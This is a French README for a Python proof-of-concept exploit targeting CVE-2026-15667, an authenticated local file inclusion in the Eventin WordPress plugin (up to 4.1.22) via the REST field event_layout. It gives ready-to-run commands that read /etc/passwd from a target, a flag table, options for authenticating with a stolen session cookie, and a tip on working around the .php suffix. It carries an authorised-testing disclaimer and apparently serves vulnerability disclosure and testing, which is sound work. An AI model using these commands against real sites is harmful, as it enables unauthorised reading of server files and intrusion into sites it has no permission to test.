
Preuve de concept Python pour CVE-2026-15667, une inclusion de fichier local authentifiée dans le plugin WordPress Eventin via le champ REST event_layout.
CVE-2026-15667 WordPress Event Solution LFI POC
Eventin (extension WordPress wp-event-solution) ≤ 4.1.22 — inclusion de fichier local authentifiée (Contributor+) via le champ REST event_layout.
Pour tests autorisés uniquement. Ne pas exécuter contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation de test.
Nécessite : Python 3, bibliothèque standard uniquement.
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --test
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --test --uname USER --password PASS
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --file /etc/passwd --uname USER --password PASS
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --file /etc/passwd --session 'wordpress_logged_in_HASH=...'
| Flag | Ce qu'il fait |
|---|
-u / --url | Racine du site WordPress (requis). http:// ou https:// ; un nom d'hôte est essayé en HTTPS d'abord, puis en HTTP. Le TLS auto-signé est retenté automatiquement. |
--test | Invité : version du plugin + route REST. Avec authentification : POST d'un traversal et signalement s'il a été stocké |
--file PATH | Inclut PATH via la LFI et affiche la sortie. Nécessite une authentification |
--uname | Nom d'utilisateur WordPress (Contributor+) |
--password | Mot de passe WordPress |
--session | En-tête Cookie du navigateur (ou wordpress_logged_in_*=...). Ignore /wp-login.php |
--uname/--password et --session sont interchangeables. Vous avez besoin d'une paire ou du cookie pour --file et pour la partie authentifiée de --test.
--test sans identifiants est non authentifié (readme + /wp-json/eventin/v2/events). L'inclusion elle-même ne l'est pas.
Le plugin inclut {layout}.php, donc --file /etc/passwd demande /etc/passwd.php. Passez un chemin .php, ou un chemin qui existe après l'ajout de .php.
Stdout : VERSION, ROUTE, PRESENT, NEED_AUTH, VULNERABLE, NOT_VULNERABLE, AUTH_FAILED, contenu du fichier.
CVE : CVE-2026-15667. Signalé par Wordfence PRISM.